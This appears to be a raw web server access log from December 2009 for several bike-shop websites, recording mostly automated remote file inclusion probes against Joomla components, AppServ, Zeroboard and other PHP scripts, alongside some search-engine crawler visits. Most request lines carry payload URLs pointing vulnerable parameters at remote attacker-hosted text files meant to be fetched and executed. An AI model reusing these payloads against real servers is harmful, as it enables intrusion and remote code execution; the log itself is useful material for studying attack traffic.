79.136.232.126 - - [11/Dec/2009:00:07:15 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.234.106.119 - - [11/Dec/2009:00:07:40 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.dgr.go.th/service/mors//modules/Forums/admin/zip/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.234.106.119 - - [11/Dec/2009:00:07:40 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.dgr.go.th/service/mors//modules/Forums/admin/zip/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.234.106.119 - - [11/Dec/2009:00:07:40 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.dgr.go.th/service/mors//modules/Forums/admin/zip/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:00:17:53 -0800] "GET ///?zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 1765 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:00:17:53 -0800] "GET /logs////?zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 2375 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:00:17:55 -0800] "GET /logs/access.log%20%20////?zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:00:17:57 -0800] "GET /logs/access.log%20%20////?zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:00:17:57 -0800] "GET ///?zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 1765 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:00:17:57 -0800] "GET /logs////?zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 2375 "-" "Mozilla/5.0" "houstonbikeshop.com"
79.136.232.126 - - [11/Dec/2009:00:21:35 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.115.221 - - [11/Dec/2009:00:23:04 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
67.195.115.221 - - [11/Dec/2009:00:23:04 -0800] "GET /?N=D HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
211.234.106.119 - - [11/Dec/2009:00:23:18 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.dgr.go.th/service/mors//modules/Forums/admin/zip/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.132.134.198 - - [11/Dec/2009:00:25:35 -0800] "GET /main.php?appserv_root=http://131.188.2.99:88/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.132.134.198 - - [11/Dec/2009:00:25:35 -0800] "GET /logs/access.log%20%20/main.php?appserv_root=http://131.188.2.99:88/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.132.134.198 - - [11/Dec/2009:00:25:35 -0800] "GET /logs/main.php?appserv_root=http://131.188.2.99:88/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.37.114 - - [11/Dec/2009:00:28:28 -0800] "GET /?S=A HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
119.202.76.160 - - [11/Dec/2009:00:31:05 -0800] "GET /errors.php?error=http://www.anginbali.com/filemgmt_data/snaps/tmp/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
119.202.76.160 - - [11/Dec/2009:00:31:05 -0800] "GET /logs//errors.php?error=http://www.anginbali.com/filemgmt_data/snaps/tmp/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
119.202.76.160 - - [11/Dec/2009:00:31:06 -0800] "GET /logs/access.log//errors.php?error=http://www.anginbali.com/filemgmt_data/snaps/tmp/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:00:35:45 -0800] "GET /logs/access.log////?zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:00:36:29 -0800] "GET /logs/access.log////?zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.172.33.230 - - [11/Dec/2009:00:39:15 -0800] "GET /translations/tools/send_reminders.php?noSet=0&includedir=http://www.dohio.org/joomla/cache/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.172.33.230 - - [11/Dec/2009:00:39:15 -0800] "GET /translations/Portuguese.txt%20%20/tools/send_reminders.php?noSet=0&includedir=http://www.dohio.org/joomla/cache/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.172.33.230 - - [11/Dec/2009:00:39:15 -0800] "GET /translations/Polish.txt%20%20/tools/send_reminders.php?noSet=0&includedir=http://www.dohio.org/joomla/cache/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.172.33.230 - - [11/Dec/2009:00:39:15 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.dohio.org/joomla/cache/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.19.45 - - [11/Dec/2009:00:42:35 -0800] "GET /translations/Polish.txt%20%20/tools/send_reminders.php?noSet=0&includedir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.19.45 - - [11/Dec/2009:00:42:35 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.19.45 - - [11/Dec/2009:00:42:35 -0800] "GET /translations/tools/send_reminders.php?noSet=0&includedir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.19.45 - - [11/Dec/2009:00:42:35 -0800] "GET /translations/Portuguese.txt%20%20/tools/send_reminders.php?noSet=0&includedir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.172.33.230 - - [11/Dec/2009:00:42:46 -0800] "GET /translations/Portuguese.txt/tools/send_reminders.php?noSet=0&includedir=http://www.dohio.org/joomla/cache/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.172.33.230 - - [11/Dec/2009:00:42:46 -0800] "GET /translations/Polish.txt/tools/send_reminders.php?noSet=0&includedir=http://www.dohio.org/joomla/cache/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.89.219.140 - - [11/Dec/2009:00:43:36 -0800] "GET /translations/Polish.txt%20%20/tools/send_reminders.php?noSet=0&includedir=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.89.219.140 - - [11/Dec/2009:00:43:36 -0800] "GET /translations/tools/send_reminders.php?noSet=0&includedir=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.89.219.140 - - [11/Dec/2009:00:43:36 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.89.219.140 - - [11/Dec/2009:00:43:36 -0800] "GET /translations/Portuguese.txt%20%20/tools/send_reminders.php?noSet=0&includedir=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.98.136.21 - - [11/Dec/2009:00:44:45 -0800] "GET /translations/Japanese.txt%20%20/tools/send_reminders.php?noSet=0&includedir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.98.136.21 - - [11/Dec/2009:00:44:45 -0800] "GET /translations/tools/send_reminders.php?noSet=0&includedir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.98.136.21 - - [11/Dec/2009:00:44:45 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.98.136.21 - - [11/Dec/2009:00:44:45 -0800] "GET /translations/Portuguese.txt%20%20/tools/send_reminders.php?noSet=0&includedir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.19.45 - - [11/Dec/2009:00:47:25 -0800] "GET /translations/Polish.txt/tools/send_reminders.php?noSet=0&includedir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.19.45 - - [11/Dec/2009:00:47:25 -0800] "GET /translations/Portuguese.txt/tools/send_reminders.php?noSet=0&includedir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.98.136.21 - - [11/Dec/2009:00:48:44 -0800] "GET /translations/Polish.txt/tools/send_reminders.php?noSet=0&includedir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.98.136.21 - - [11/Dec/2009:00:48:44 -0800] "GET /translations/Portuguese.txt/tools/send_reminders.php?noSet=0&includedir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:00:49:23 -0800] "GET ///?zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 200 1765 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:00:49:24 -0800] "GET /logs/access.log////?zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:00:49:24 -0800] "GET /logs////?zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 200 2375 "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:00:49:27 -0800] "GET /logs/access.log//main.php?sayfa=http://gayivf.rscnewengland.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:00:49:27 -0800] "GET /main.php?sayfa=http://gayivf.rscnewengland.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:00:49:27 -0800] "GET /logs//main.php?sayfa=http://gayivf.rscnewengland.com/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:00:50:13 -0800] "GET ///?zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 200 1765 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:00:50:13 -0800] "GET /logs/access.log////?zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:00:50:13 -0800] "GET /logs////?zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 200 2375 "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:00:52:44 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://gayivf.rscnewengland.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.111.183 - - [11/Dec/2009:00:53:38 -0800] "GET /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.15.22.18 - - [11/Dec/2009:00:55:22 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.15.22.18 - - [11/Dec/2009:00:55:22 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.15.22.18 - - [11/Dec/2009:00:55:22 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.15.22.18 - - [11/Dec/2009:00:55:25 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.15.22.18 - - [11/Dec/2009:00:55:26 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.15.22.18 - - [11/Dec/2009:00:55:26 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
199.120.90.223 - - [11/Dec/2009:00:57:48 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
199.120.90.223 - - [11/Dec/2009:00:57:48 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
199.120.90.223 - - [11/Dec/2009:00:57:49 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
199.120.90.223 - - [11/Dec/2009:00:58:52 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
85.236.38.227 - - [11/Dec/2009:01:02:45 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.236.38.227 - - [11/Dec/2009:01:02:46 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.236.38.227 - - [11/Dec/2009:01:02:47 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.236.38.227 - - [11/Dec/2009:01:03:19 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.236.38.227 - - [11/Dec/2009:01:03:19 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.236.38.227 - - [11/Dec/2009:01:03:20 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.132.134.198 - - [11/Dec/2009:01:06:17 -0800] "GET /logs/access.log/main.php?appserv_root=http://131.188.2.99:88/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:01:17:47 -0800] "GET ///?zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 1765 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:01:17:47 -0800] "GET /logs////?zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 2375 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:01:17:47 -0800] "GET /logs/access.log////?zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:01:18:00 -0800] "GET /logs/access.log////?zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:01:18:00 -0800] "GET /logs////?zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 2375 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.102.237.81 - - [11/Dec/2009:01:18:00 -0800] "GET ///?zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 1765 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.29.247 - - [11/Dec/2009:01:29:08 -0800] "GET /temporarypreviewfile.html HTTP/1.1" 200 1706 "-" "Yandex/1.01.001 (compatible; Win16; I)" "bicyclestoreshouston.com"
208.80.193.44 - - [11/Dec/2009:01:36:56 -0800] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; SV1; YPC 3.0.0; .NET CLR 1.1.4322)" "bicyclestoreshouston.com"
83.167.62.171 - - [11/Dec/2009:02:05:55 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "svbikes.com"
83.167.62.171 - - [11/Dec/2009:02:05:55 -0800] "GET /tmp/?N=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "svbikes.com"
93.190.48.203 - - [11/Dec/2009:02:17:12 -0800] "GET /logs//?mosConfig_absolute.path=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 200 2373 "-" "Advanced Browser (http://www.avantbrowser.com)" "houstonbikeshop.com"
93.190.48.203 - - [11/Dec/2009:02:17:12 -0800] "GET /?mosConfig_absolute.path=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 200 1764 "-" "Advanced Browser (http://www.avantbrowser.com)" "houstonbikeshop.com"
94.75.207.2 - - [11/Dec/2009:02:17:20 -0800] "GET /administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[ADMIN_DIR]=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "houstonbikeshop.com"
94.75.207.2 - - [11/Dec/2009:02:17:20 -0800] "GET /logs/administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[ADMIN_DIR]=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "houstonbikeshop.com"
93.190.48.203 - - [11/Dec/2009:02:17:35 -0800] "GET /logs/administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[ADMIN_DIR]=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
93.190.48.203 - - [11/Dec/2009:02:17:35 -0800] "GET /administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[ADMIN_DIR]=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
94.75.207.2 - - [11/Dec/2009:02:21:06 -0800] "GET /?mosConfig_absolute.path=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "houstonbikeshop.com"
94.75.207.2 - - [11/Dec/2009:02:21:06 -0800] "GET /logs//?mosConfig_absolute.path=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "houstonbikeshop.com"
93.190.48.203 - - [11/Dec/2009:02:32:00 -0800] "GET /administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[ADMIN_DIR]=http://usbgadgetshop.com/images/iid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.48.203 - - [11/Dec/2009:02:32:01 -0800] "GET /logs/access.log%20%20/administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[ADMIN_DIR]=http://usbgadgetshop.com/images/iid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.48.203 - - [11/Dec/2009:02:32:01 -0800] "GET /logs/administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[ADMIN_DIR]=http://usbgadgetshop.com/images/iid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
128.241.54.188 - - [11/Dec/2009:02:40:20 -0800] "GET /logs//include/write.php?dir=http://www.ancientartstudios.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
128.241.54.188 - - [11/Dec/2009:02:40:20 -0800] "GET /include/write.php?dir=http://www.ancientartstudios.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
128.241.54.188 - - [11/Dec/2009:02:40:20 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.ancientartstudios.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.92.156.53 - - [11/Dec/2009:02:41:31 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/images/_notes/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.92.156.53 - - [11/Dec/2009:02:41:31 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/images/_notes/idxx.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.92.156.53 - - [11/Dec/2009:02:41:31 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/images/_notes/idxx.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.48.203 - - [11/Dec/2009:02:51:31 -0800] "GET /logs/access.log/administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[ADMIN_DIR]=http://usbgadgetshop.com/images/iid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.92.156.53 - - [11/Dec/2009:02:53:42 -0800] "GET /translations/Portuguese.txt%20%20///?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/images/_notes/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.92.156.53 - - [11/Dec/2009:02:53:42 -0800] "GET /translations/Polish.txt%20%20///?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/images/_notes/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.92.156.53 - - [11/Dec/2009:02:53:42 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/images/_notes/idxx.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.92.156.53 - - [11/Dec/2009:02:53:42 -0800] "GET /translations///?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/images/_notes/idxx.txt?? HTTP/1.1" 200 3861 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.37.114 - - [11/Dec/2009:03:01:24 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
67.195.37.114 - - [11/Dec/2009:03:01:24 -0800] "GET /Bikes.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
128.241.54.188 - - [11/Dec/2009:03:02:12 -0800] "GET /logs/access.log//include/write.php?dir=http://www.ancientartstudios.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.129.119.14 - - [11/Dec/2009:03:06:47 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "bicyclestoreshouston.com"
67.19.51.194 - - [11/Dec/2009:03:11:57 -0800] "GET //appserv/main.php?appserv_root=http://vostokmedia.com//files/Image/02.06.09/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.19.51.194 - - [11/Dec/2009:03:11:57 -0800] "GET /logs///appserv/main.php?appserv_root=http://vostokmedia.com//files/Image/02.06.09/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.19.51.194 - - [11/Dec/2009:03:11:57 -0800] "GET /logs/access.log%20%20///appserv/main.php?appserv_root=http://vostokmedia.com//files/Image/02.06.09/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.19.51.194 - - [11/Dec/2009:03:14:18 -0800] "GET /logs///appserv/main.php?appserv_root=http://vostokmedia.com//files/Image/02.06.09/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.19.51.194 - - [11/Dec/2009:03:14:18 -0800] "GET //appserv/main.php?appserv_root=http://vostokmedia.com//files/Image/02.06.09/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.19.51.194 - - [11/Dec/2009:03:14:18 -0800] "GET /logs/access.log%20%20///appserv/main.php?appserv_root=http://vostokmedia.com//files/Image/02.06.09/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
